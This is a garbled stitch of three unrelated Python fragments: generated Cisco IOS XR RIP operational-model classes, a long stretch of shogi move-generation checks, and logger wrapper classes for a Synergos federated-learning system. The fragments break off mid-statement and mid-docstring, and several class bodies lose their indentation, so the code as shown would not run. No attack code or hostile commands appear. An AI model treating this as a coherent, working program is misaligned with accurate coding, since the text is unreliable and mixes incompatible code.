class RipPeer(_Entity_):
    """
    Neighbors on this interface
    .. attribute:: peer_uptime
        Uptime of this peer
        **type**\: int
        **range:** 0..4294967295
        **config**\: False
    .. attribute:: peer_address
        IP Address of this peer
        **type**\: str
        **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
        **config**\: False
    .. attribute:: peer_version
        RIP version for this peer
        **type**\: int
        **range:** 0..255
        **config**\: False
    .. attribute:: discarded_peer_packets
        Discarded packets from this peer
        **type**\: int
        **range:** 0..4294967295
        **config**\: False
    .. attribute:: discarded_peer_routes
        Discarded routes from this peer
        **type**\: int
        **range:** 0..4294967295
        **config**\: False
    """
    # YANG module prefix and revision this generated class was built from.
    _prefix = 'ip-rip-oper'
    _revision = '2015-11-09'
    def __init__(self):
        """Initialize the 'rip-peer' entity: YANG identity, leaf descriptors, and segment path."""
        # ydk-gen emits code for both py2 and py3; pick the matching super() form.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(Rip.DefaultVrf.Interfaces.Interface.RipPeer, self).__init__()
        self.yang_name = "rip-peer"
        self.yang_parent_name = "interface"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf map: python attribute -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('peer_uptime', (YLeaf(YType.uint32, 'peer-uptime'), ['int'])),
            ('peer_address', (YLeaf(YType.str, 'peer-address'), ['str'])),
            ('peer_version', (YLeaf(YType.uint8, 'peer-version'), ['int'])),
            ('discarded_peer_packets', (YLeaf(YType.uint32, 'discarded-peer-packets'), ['int'])),
            ('discarded_peer_routes', (YLeaf(YType.uint32, 'discarded-peer-routes'), ['int'])),
        ])
        # Leaf values default to None (unset) until populated from the device.
        self.peer_uptime = None
        self.peer_address = None
        self.peer_version = None
        self.discarded_peer_packets = None
        self.discarded_peer_routes = None
        self._segment_path = lambda: "rip-peer"
        # Freeze the entity: later attribute writes go through _perform_setattr validation.
        self._is_frozen = True
    def __setattr__(self, name, value):
        """Route attribute writes through ydk's validation for this frozen entity."""
        self._perform_setattr(Rip.DefaultVrf.Interfaces.Interface.RipPeer, ['peer_uptime', 'peer_address', 'peer_version', 'discarded_peer_packets', 'discarded_peer_routes'], name, value)
    @staticmethod
    def _meta_info():
        # Local import: the meta table lives in the generated _meta package.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ip_rip_oper as meta
        return meta._meta_table['Rip.DefaultVrf.Interfaces.Interface.RipPeer']['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-info entry for the Interface class."""
    # Local import: the meta table lives in the generated _meta package.
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ip_rip_oper as meta
    return meta._meta_table['Rip.DefaultVrf.Interfaces.Interface']['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-info entry for the Interfaces container class."""
    # Local import: the meta table lives in the generated _meta package.
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ip_rip_oper as meta
    return meta._meta_table['Rip.DefaultVrf.Interfaces']['meta_info']
class Global(_Entity_):
"""
Global Information
.. attribute:: vrf_summary
VRF summary data
**type**\: :py:class:`VrfSummary <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_rip_oper.Rip.DefaultVrf.Global.VrfSummary>`
**config**\: False
.. attribute:: interface_summary
List of Interfaces configured
**type**\: list of :py:class:`InterfaceSummary <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_rip_oper.Rip.DefaultVrf.Global.InterfaceSummary>`
**config**\: False
"""
_prefix = 'ip-rip-oper'
_revision = '2015-11-09'
def __init__(self):
    """Initialize the 'global' container: VRF summary child entity and interface-summary list."""
    # ydk-gen emits code for both py2 and py3; pick the matching super() form.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(Rip.DefaultVrf.Global, self).__init__()
    self.yang_name = "global"
    self.yang_parent_name = "default-vrf"
    self.is_top_level_class = False
    self.has_list_ancestor = False
    self.ylist_key_names = []
    # Child classes: a single vrf-summary container and a list of interface summaries.
    self._child_classes = OrderedDict([("vrf-summary", ("vrf_summary", Rip.DefaultVrf.Global.VrfSummary)), ("interface-summary", ("interface_summary", Rip.DefaultVrf.Global.InterfaceSummary))])
    self._leafs = OrderedDict()  # no leafs directly under "global"
    self.vrf_summary = Rip.DefaultVrf.Global.VrfSummary()
    self.vrf_summary.parent = self
    self._children_name_map["vrf_summary"] = "vrf-summary"
    self.interface_summary = YList(self)
    self._segment_path = lambda: "global"
    self._absolute_path = lambda: "Cisco-IOS-XR-ip-rip-oper:rip/default-vrf/%s" % self._segment_path()
    # Freeze the entity: later attribute writes go through _perform_setattr validation.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes through ydk's validation for this frozen entity (no writable leafs here)."""
    self._perform_setattr(Rip.DefaultVrf.Global, [], name, value)
class VrfSummary(_Entity_):
"""
VRF summary data
.. attribute:: vrf_name
VRF Name
**type**\: str
**config**\: False
.. attribute:: active
VRF Active indicator
**type**\: bool
**config**\: False
.. attribute:: oom_flags
Current OOM flags
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: route_count
Number of routes allocated
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: path_count
Number of paths allocated
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: update_timer
Update timer
| |
== 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w9e)and Wboard.w3e==''\
and board.s8e+board.s7e+board.s6e+board.s5e+board.s4e=='':
moves = '9e3e'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w9e)and Wboard.w2e==''\
and board.s8e+board.s7e+board.s6e+board.s5e+board.s4e+board.s3e=='':
moves = '9e2e'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w9e)and Wboard.w1e==''\
and board.s8e+board.s7e+board.s6e+board.s5e+board.s4e+board.s3e+board.s2e=='':
moves = '9e1e'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+b|b', Wboard.w9e)and Wboard.w7c==''\
and board.s8d=='':
moves = '9e7c'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+b|b', Wboard.w9e)and Wboard.w6b==''\
and board.s8d+board.s7c=='':
moves = '9e6b'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+b|b', Wboard.w9e)and Wboard.w5a==''\
and board.s8d+board.s7c+board.s6b=='':
moves = '9e5a'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('b',Wboard.w9e)and Wboard.w5i==''\
and board.s6h+board.s7g+board.s8f=='':
moves = '9e5i+'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('b',Wboard.w9e)and Wboard.w6h==''\
and board.s7g+board.s8f=='':
moves = '9e6h+'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('b',Wboard.w9e)and Wboard.w7g==''\
and board.s8f=='':
moves = '9e7g+'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('\+b', Wboard.w9e)and Wboard.w5i==''\
and board.s6h+board.s7g+board.s8f=='':
moves = '9e5i'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('\+b', Wboard.w9e)and Wboard.w6h==''\
and board.s7g+board.s8f=='':
moves = '9e6h'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('\+b',Wboard.w9e)and Wboard.w7g==''\
and board.s8f=='':
moves = '9e7g'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if Wboard.w1d !='':
if re.match(r'[plsgrk+]', Wboard.w1d)and Wboard.w1e=='':
moves = '1d1e'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'[sgbk+]', Wboard.w1d)and Wboard.w2e=='':
moves = '1d2e'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'[grk+]', Wboard.w1d)and Wboard.w2d=='':
moves = '1d2d'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'[grk+]', Wboard.w1d)and Wboard.w1c=='':
moves = '1d1c'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|\+b|b|s|k',Wboard.w1d)and Wboard.w2c=='':
moves = '1d2c'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('n', Wboard.w1d)and Wboard.w2f=='':
moves = '1d2f'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('\+r', Wboard.w1d)and Wboard.w1i==''\
and board.s1h+board.s1g+board.s1f+board.s1e=='':
moves = '1d1i'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'r|l', Wboard.w1d)and Wboard.w1i==''\
and board.s1h+board.s1g+board.s1f+board.s1e=='':
moves = '1d1i+'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('\+r', Wboard.w1d)and Wboard.w1h==''\
and board.s1g+board.s1f+board.s1e=='':
moves = '1d1h'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'r|l', Wboard.w1d)and Wboard.w1h==''\
and board.s1g+board.s1f+board.s1e=='':
moves = '1d1h+'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|l', Wboard.w1d)and Wboard.w1g==''\
and board.s1f+board.s1e=='':
moves = '1d1g'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'r|l', Wboard.w1d)and Wboard.w1g==''\
and board.s1f+board.s1e=='':
moves = '1d1g+'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r|l', Wboard.w1d)and Wboard.w1f==''\
and board.s1e=='':
moves = '1d1f'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w1d)and Wboard.w1b==''\
and board.s1c=='':
moves = '1d1b'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w1d)and Wboard.w1a==''\
and board.s1c+board.s1b=='':
moves = '1d1a'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w1d)and Wboard.w3d==''\
and board.s2d=='':
moves = '1d3d'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w1d)and Wboard.w4d==''\
and board.s2d+board.s3d=='':
moves = '1d4d'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w1d)and Wboard.w5d==''\
and board.s2d+board.s3d+board.s4d=='':
moves = '1d5d'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w1d)and Wboard.w6d==''\
and board.s2d+board.s3d+board.s4d+board.s5d=='':
moves = '1d6d'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w1d)and Wboard.w7d==''\
and board.s2d+board.s3d+board.s4d+board.s5d+board.s6d=='':
moves = '1d7d'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w1d)and Wboard.w8d==''\
and board.s2d+board.s3d+board.s4d+board.s5d+board.s6d+board.s7d=='':
moves = '1d8d'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w1d)and Wboard.w9d==''\
and board.s2d+board.s3d+board.s4d+board.s5d+board.s6d+board.s7d+board.s8d=='':
moves = '1d9d'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+b|b', Wboard.w1d)and Wboard.w3f==''\
and board.s2e=='':
moves = '1d3f'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('\+b', Wboard.w1d)and Wboard.w4g==''\
and board.s2e+board.s3f=='':
moves = '1d4g'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('\+b', Wboard.w1d)and Wboard.w5h==''\
and board.s2e+board.s3f+board.s4g=='':
moves = '1d5h'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('\+b', Wboard.w1d)and Wboard.w6i==''\
and board.s2e+board.s3f+board.s4g+board.s5h=='':
moves = '1d6i'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('\+b', Wboard.w1d)and Wboard.w4a==''\
and board.s3b+board.s2c=='':
moves = '1d4a'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('\+b', Wboard.w1d)and Wboard.w3b==''\
and board.s2c=='':
moves = '1d3b'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('b', Wboard.w1d)and Wboard.w4g==''\
and board.s2e+board.s3f=='':
moves = '1d4g+'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('b', Wboard.w1d)and Wboard.w5h==''\
and board.s2e+board.s3f+board.s4g=='':
moves = '1d5h+'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('b', Wboard.w1d)and Wboard.w6i==''\
and board.s2e+board.s3f+board.s4g+board.s5h=='':
moves = '1d6i+'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if Wboard.w2d !='':
if re.match(r'[plsgrk+]', Wboard.w2d)and Wboard.w2e=='':
moves = '2d2e'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'[sgbk+]', Wboard.w2d)and Wboard.w1e=='':
moves = '2d1e'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'[sgbk+]', Wboard.w2d)and Wboard.w3e=='':
moves = '2d3e'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'[grk+]', Wboard.w2d)and Wboard.w1d=='':
moves = '2d1d'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'[grk+]', Wboard.w2d)and Wboard.w3d=='':
moves = '2d3d'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'[grk+]', Wboard.w2d)and Wboard.w2c=='':
moves = '2d2c'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|\+b|b|s|k',Wboard.w2d)and Wboard.w1c=='':
moves = '2d1c'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|\+b|b|s|k',Wboard.w2d)and Wboard.w3c=='':
moves = '2d3c'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('n', Wboard.w2d)and Wboard.w1f=='':
moves = '2d1f'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('n', Wboard.w2d)and Wboard.w3f=='':
moves = '2d3f'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('\+r', Wboard.w2d)and Wboard.w2i==''\
and board.s2h+board.s2g+board.s2f+board.s2e=='':
moves = '2d2i'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'r|l', Wboard.w2d)and Wboard.w2i==''\
and board.s2h+board.s2g+board.s2f+board.s2e=='':
moves = '2d2i+'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('\+r', Wboard.w2d)and Wboard.w2h==''\
and board.s2g+board.s2f+board.s2e=='':
moves = '2d2h'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'r|l', Wboard.w2d)and Wboard.w2h==''\
and board.s2g+board.s2f+board.s2e=='':
moves = '2d2h+'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|l', Wboard.w2d)and Wboard.w2g==''\
and board.s2f+board.s2e=='':
moves = '2d2g'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'r|l', Wboard.w2d)and Wboard.w2g==''\
and board.s2f+board.s2e=='':
moves = '2d2g+'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r|l', Wboard.w2d)and Wboard.w2f==''\
and board.s2e=='':
moves = '2d2f'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w2d)and Wboard.w2b==''\
and board.s2c=='':
moves = '2d2b'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w2d)and Wboard.w2a==''\
and board.s2c+board.s2b=='':
moves = '2d2a'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w2d)and Wboard.w4d==''\
and board.s3d=='':
moves = '2d4d'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w2d)and Wboard.w5d==''\
and board.s3d+board.s4d=='':
moves = '2d5d'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w2d)and Wboard.w6d==''\
and board.s3d+board.s4d+board.s5d=='':
moves = '2d6d'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w2d)and Wboard.w7d==''\
and board.s3d+board.s4d+board.s5d+board.s6d=='':
moves = '2d7d'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w2d)and Wboard.w8d==''\
and board.s3d+board.s4d+board.s5d+board.s6d+board.s7d=='':
moves = '2d8d'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w2d)and Wboard.w9d==''\
and board.s3d+board.s4d+board.s5d+board.s6d+board.s7d+board.s8d=='':
moves = '2d9d'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+b|b', Wboard.w2d)and Wboard.w4f==''\
and board.s3e=='':
moves = '2d4f'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('\+b', Wboard.w2d)and Wboard.w5g==''\
and board.s3e+board.s4f=='':
moves = '2d5g'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('\+b', Wboard.w2d)and Wboard.w6h==''\
and board.s3e+board.s4f+board.s5g=='':
moves = '2d6h'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('\+b', Wboard.w2d)and Wboard.w7i==''\
and board.s3e+board.s4f+board.s5g+board.s6h=='':
moves = '2d7i'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+b|b', Wboard.w2d)and Wboard.w5a==''\
and board.s4b+board.s3c=='':
moves = '2d5a'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+b|b', Wboard.w2d)and Wboard.w4b==''\
and board.s3c=='':
moves = '2d4b'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('b', Wboard.w2d)and Wboard.w5g==''\
and board.s3e+board.s4f=='':
moves = '2d5g+'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('b', Wboard.w2d)and Wboard.w6h==''\
and board.s3e+board.s4f+board.s5g=='':
moves = '2d6h+'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('b', Wboard.w2d)and Wboard.w7i==''\
and board.s3e+board.s4f+board.s5g+board.s6h=='':
moves = '2d7i+'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if Wboard.w3d !='':
if re.match(r'[plsgrk+]', Wboard.w3d)and Wboard.w3e=='':
moves = '3d3e'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'[sgbk+]', Wboard.w3d)and Wboard.w2e=='':
moves = '3d2e'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'[sgbk+]', Wboard.w3d)and Wboard.w4e=='':
moves = '3d4e'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'[grk+]', Wboard.w3d)and Wboard.w2d=='':
moves = '3d2d'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'[grk+]', Wboard.w3d)and Wboard.w4d=='':
moves = '3d4d'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'[grk+]', Wboard.w3d)and Wboard.w3c=='':
moves = '3d3c'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|\+b|b|s|k',Wboard.w3d)and Wboard.w2c=='':
moves = '3d2c'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|\+b|b|s|k',Wboard.w3d)and Wboard.w4c=='':
moves = '3d4c'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('n', Wboard.w3d)and Wboard.w2f=='':
moves = '3d2f'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('n', Wboard.w3d)and Wboard.w4f=='':
moves = '3d4f'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('\+r', Wboard.w3d)and Wboard.w3i==''\
and board.s3h+board.s3g+board.s3f+board.s3e=='':
moves = '3d3i'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'r|l', Wboard.w3d)and Wboard.w3i==''\
and board.s3h+board.s3g+board.s3f+board.s3e=='':
moves = '3d3i+'
| |
#!/usr/bin/env python
####################
# Required Modules #
####################
# Generic/Built-in
import logging
import signal
import sys
import time
from multiprocessing import Process
from typing import Dict, List, Optional
# Lib
# Custom
from .base import RootLogger
from .config import (
DIRECTOR_NAME_TEMPLATE,
TTP_NAME_TEMPLATE,
WORKER_NAME_TEMPLATE,
SYSMETRICS_NAME_TEMPLATE,
SYSMETRICS_PORT,
DIRECTOR_PORT,
TTP_PORT,
WORKER_PORT
)
from .utils import StructlogUtils
##################
# Configurations #
##################
############################################
# Organisation Core Class - DirectorLogger #
############################################
class DirectorLogger(RootLogger):
    """ Logger for a Synergos Director node.

    Thin wrapper around RootLogger that derives the node's canonical logger
    name from DIRECTOR_NAME_TEMPLATE and falls back to DIRECTOR_PORT when no
    port is given.

    Args:
        logger_name (str): Base name used to derive the node's logger ID
        logging_variant (str): Type of logging to use ("basic" or "graylog")
        server (str): Host address of the logging server, if any
        port (int): Port of the logging server; defaults to DIRECTOR_PORT
        logging_level (int): logging.DEBUG, logging.INFO, logging.WARNING etc.
        debugging_fields (bool): Forwarded to RootLogger
        filter_functions (list(str)): Forwarded to RootLogger; defaults to []
        censor_keys (list): Keys whose values should be censored in logs
        file_path (str): Path to file storing logging messages
    """

    def __init__(
        self,
        logger_name: str,
        logging_variant: str = "basic",
        server: Optional[str] = None,
        port: Optional[int] = None,
        logging_level: int = logging.INFO,
        debugging_fields: bool = False,
        filter_functions: Optional[List[str]] = None,
        censor_keys: Optional[list] = None,
        file_path: str = ""
    ):
        # Network attributes
        # e.g. server IP and/or port number
        PORT = port if port else DIRECTOR_PORT

        # Data attributes
        # e.g participant_id/run_id in specific format
        NODE_NAME = DIRECTOR_NAME_TEMPLATE.safe_substitute(name=logger_name)

        super().__init__(
            server=server,
            port=PORT,
            logger_name=NODE_NAME,
            logging_level=logging_level,
            logging_variant=logging_variant,
            debugging_fields=debugging_fields,
            # Fresh lists per instantiation -- the previous mutable default
            # arguments ([]) were shared across every construction
            filter_functions=filter_functions if filter_functions is not None else [],
            censor_keys=censor_keys if censor_keys is not None else [],
            file_path=file_path
        )
#######################################
# Organisation Core Class - TTPLogger #
#######################################
class TTPLogger(RootLogger):
    """ Logger for a Synergos TTP node.

    Thin wrapper around RootLogger that derives the node's canonical logger
    name from TTP_NAME_TEMPLATE and falls back to TTP_PORT when no port is
    given.

    Args:
        logger_name (str): Base name used to derive the node's logger ID
        logging_variant (str): Type of logging to use ("basic" or "graylog")
        server (str): Host address of the logging server, if any
        port (int): Port of the logging server; defaults to TTP_PORT
        logging_level (int): logging.DEBUG, logging.INFO, logging.WARNING etc.
        debugging_fields (bool): Forwarded to RootLogger
        filter_functions (list(str)): Forwarded to RootLogger; defaults to []
        censor_keys (list): Keys whose values should be censored in logs
        file_path (str): Path to file storing logging messages
    """

    def __init__(
        self,
        logger_name: str,
        logging_variant: str = "basic",
        server: Optional[str] = None,
        port: Optional[int] = None,
        logging_level: int = logging.INFO,
        debugging_fields: bool = False,
        filter_functions: Optional[List[str]] = None,
        censor_keys: Optional[list] = None,
        file_path: str = ""
    ):
        # Network attributes
        # e.g. server IP and/or port number
        PORT = port if port else TTP_PORT

        # Data attributes
        # e.g participant_id/run_id in specific format
        NODE_NAME = TTP_NAME_TEMPLATE.safe_substitute(name=logger_name)

        super().__init__(
            server=server,
            port=PORT,
            logger_name=NODE_NAME,
            logging_level=logging_level,
            logging_variant=logging_variant,
            debugging_fields=debugging_fields,
            # Fresh lists per instantiation -- avoids shared mutable defaults
            filter_functions=filter_functions if filter_functions is not None else [],
            censor_keys=censor_keys if censor_keys is not None else [],
            file_path=file_path
        )
##########################################
# Organisation Core Class - WorkerLogger #
##########################################
class WorkerLogger(RootLogger):
    """ Logger for a Synergos Worker node.

    Thin wrapper around RootLogger that derives the node's canonical logger
    name from WORKER_NAME_TEMPLATE and falls back to WORKER_PORT when no port
    is given.

    Args:
        logger_name (str): Base name used to derive the node's logger ID
        logging_variant (str): Type of logging to use ("basic" or "graylog")
        server (str): Host address of the logging server, if any
        port (int): Port of the logging server; defaults to WORKER_PORT
        logging_level (int): logging.DEBUG, logging.INFO, logging.WARNING etc.
        debugging_fields (bool): Forwarded to RootLogger
        filter_functions (list(str)): Forwarded to RootLogger; defaults to []
        censor_keys (list): Keys whose values should be censored in logs
        file_path (str): Path to file storing logging messages
    """

    def __init__(
        self,
        logger_name: str,
        logging_variant: str = "basic",
        server: Optional[str] = None,
        port: Optional[int] = None,
        logging_level: int = logging.INFO,
        debugging_fields: bool = False,
        filter_functions: Optional[List[str]] = None,
        censor_keys: Optional[list] = None,
        file_path: str = "",
    ):
        # Network attributes
        # e.g. server IP and/or port number
        PORT = port if port else WORKER_PORT

        # Data attributes
        # e.g participant_id/run_id in specific format
        NODE_NAME = WORKER_NAME_TEMPLATE.safe_substitute(name=logger_name)

        super().__init__(
            server=server,
            port=PORT,
            logger_name=NODE_NAME,
            logging_level=logging_level,
            logging_variant=logging_variant,
            debugging_fields=debugging_fields,
            # Fresh lists per instantiation -- avoids shared mutable defaults
            filter_functions=filter_functions if filter_functions is not None else [],
            censor_keys=censor_keys if censor_keys is not None else [],
            file_path=file_path
        )
#############################################
# Organisation Core Class - SysmetricLogger #
#############################################
class SysmetricLogger(RootLogger):
"""
initialise configuration for setting up a logging server using structlog
Attributes:
file_path (str): Path to file storing logging messages (arbitrary Graylog arguments)
server (str): Host address of the logging server e.g. 127.0.0.1 for Graylog
port (int): Port of the logging server e.g. 9000 for graylog
logging_level (int): logging.DEBUG, logging.INFO, logging.WARNING etc..
logger_name (str): Logger ID by name e.g. TTP, worker_1, worker_2
        logging_variant: Type of logging to use. There are 2 main options:
            1. "basic"   -> basic logging,
            2. "graylog" -> logging to graylog server
            Default: "basic"
"""
def __init__(
self,
logger_name: str,
logging_variant: str = "basic",
server: str = None,
port: int = None,
logging_level: int = logging.INFO,
debugging_fields: bool = False,
filter_functions: List[str] = [],
censor_keys: list = [],
file_path: str = "",
):
# General attributes
# e.g. misc attibutes unique to problem
# Network attributes
# e.g. server IP and/or port number
PORT = port if port else SYSMETRICS_PORT
# Data attributes
# e.g participant_id/run_id in specific format
NODE_NAME = SYSMETRICS_NAME_TEMPLATE.safe_substitute(name=logger_name)
# Optimisation attributes
# e.g multiprocess/asyncio if necessary for optimisation
self.tracker = None
# Export Attributes
# e.g. any artifacts that are going to be exported eg Records
super().__init__(
server=server,
port=PORT,
logger_name=NODE_NAME,
logging_level=logging_level,
logging_variant=logging_variant,
debugging_fields=debugging_fields,
filter_functions=filter_functions,
censor_keys=censor_keys,
file_path=file_path
)
############
# Checkers #
############
def is_tracking(self) -> bool:
""" Checks if logger is currently tracking to enforce idempotence
Returns:
State (bool)
"""
return self.tracker is not None
###########
# Helpers #
###########
def _configure_processors(self):
""" Overrides parent's _configure_processors() to add in system
tracking filters
Args:
censor_keys (list(callable)):
Returns:
Structlog Processes (list(callable))
"""
structlog_utils = StructlogUtils(
censor_keys=self.censor_keys,
file_path=self.file_path
)
track_cpu_stats = structlog_utils.track_cpu_stats
track_memory_stats = structlog_utils.track_memory_stats
track_disk_stats = structlog_utils.track_disk_stats
track_network_stats = structlog_utils.track_network_stats
###########################
# Implementation Footnote #
###########################
# [Cause]
# In Structlog, a processor is a callable object that executes a
# certain action upon a given event_dict input, and returns an
# augmented event_dict as output. As such, a Structlog processor chain
# is formed and parsed in order and sequentially.
#
# eg.
# wrapped_logger.msg(
# f4(
# wrapped_logger, "msg",
# f3(
# wrapped_logger, "msg",
# f2(
# wrapped_logger, "msg",
# f1(
# wrapped_logger, "msg",
# {"event": "some_event", "x": 42, "y": 23}
# )
# )
# )
# )
# )
#
# More details on this can be found at:
# https://www.structlog.org/en/stable/processors.html?highlight=chain
# [Problems]
# However, a custom processor handling PyGelf compatibility will
# have an asymmetric output w.r.t other processors, and thus cannot be
# used as inputs to a subsequent processor downstream. The generic
# processors procured from the parent class terminates with such a
# process.
# [Solution]
# Ensure that generic processors procured from the parent class are
# ALWAYS appended at the back of the processor list, ensuring that the
# custom PyGelf processor is ALWAYS the final processor executed.
generic_processors = super()._configure_processors()
hardware_processors = [
track_cpu_stats,
track_memory_stats,
track_disk_stats,
